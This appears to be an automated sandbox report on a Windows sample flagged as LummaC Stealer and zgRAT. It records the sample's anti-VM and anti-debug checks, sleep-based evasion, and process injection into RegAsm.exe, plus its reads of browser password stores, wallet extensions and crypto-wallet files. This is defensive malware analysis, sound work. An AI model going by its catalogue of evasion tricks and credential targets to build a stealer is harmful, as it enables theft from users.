Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TT4ybwWc1T.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: TT4ybwWc1T.exe, 00000000.00000002.1380457210.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.0000000006124000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: TT4ybwWc1T.exe, 00000000.00000002.1375458555.0000000006056000.00000004.00000800.00020000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1380457210.0000000006FFA000.00000004.08000000.00040000.00000000.sdmp, TT4ybwWc1T.exe, 00000000.00000002.1375458555.00000000061E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: sensible_and_easy_to_assist.pdb source: TT4ybwWc1T.exe

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C94CC2B push ecx; ret	0_2_6C94CC3E
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C94D565 push ecx; ret	0_2_6C94D578
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_02AC77A2 push ecx; retf	0_2_02AC77A5
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_056D5A34 push es; ret	0_2_056D5A37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00463438 push ecx; ret	2_2_0046344B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401A09 push eax; mov dword ptr [esp], 00000000h	2_2_00401A0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00471DE5 push esi; ret	2_2_00471DEE

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C8FB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6C8FB6C0

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: TT4ybwWc1T.exe PID: 5496, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00401000 GetSystemDefaultUILanguage,GetSystemDefaultLangID,GetUserDefaultUILanguage,GetUserDefaultLangID,ExitProcess, lea ecx, dword ptr [ebx-00000419h]

2_2_00401000

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 1032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7192	Thread sleep count: 407 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7192	Thread sleep count: 792 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7188	Thread sleep time: -239232s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239779	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239562	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239453	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239343	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239232	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Window / User API: threadDelayed 407			Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Window / User API: threadDelayed 792			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

2_2_00427848

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00462BD8 FindFirstFileExW,		2_2_00462BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00462C8C FindFirstFileExW,FindNextFileW,FindClose,FindClose,		2_2_00462C8C

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239779	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239562	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239453	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239343	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 239232	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW 3
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegAsm.exe, 00000002.00000002.1781462307.000000000397C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C94948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6C94948B

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C8FB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6C8FB6C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0043A046 GetProcessHeap,HeapFree,

2_2_0043A046

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044711F mov eax, dword ptr fs:[00000030h]	2_2_0044711F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004573F6 mov ecx, dword ptr fs:[00000030h]	2_2_004573F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00460A5F mov eax, dword ptr fs:[00000030h]	2_2_00460A5F

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C94948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C94948B
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Code function: 0_2_6C94B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C94B144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00449140 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00449140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0045E6AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0045E6AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00448C33 SetUnhandledExceptionFilter,	2_2_00448C33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00448C3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00448C3F

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47B000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 480000	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 657008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Queries volume information: C:\Users\user\Desktop\TT4ybwWc1T.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TT4ybwWc1T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C9484B0 cpuid

0_2_6C9484B0

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C94A25A GetSystemTimeAsFileTime,__aulldiv,

0_2_6C94A25A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00464894 GetTimeZoneInformation,

2_2_00464894

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7208, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected zgRAT

Source: Yara match	File source: TT4ybwWc1T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.TT4ybwWc1T.exe.460000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: RegAsm.exe, 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: TT4ybwWc1T.exe, 00000000.00000000.1350052714.0000000000462000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
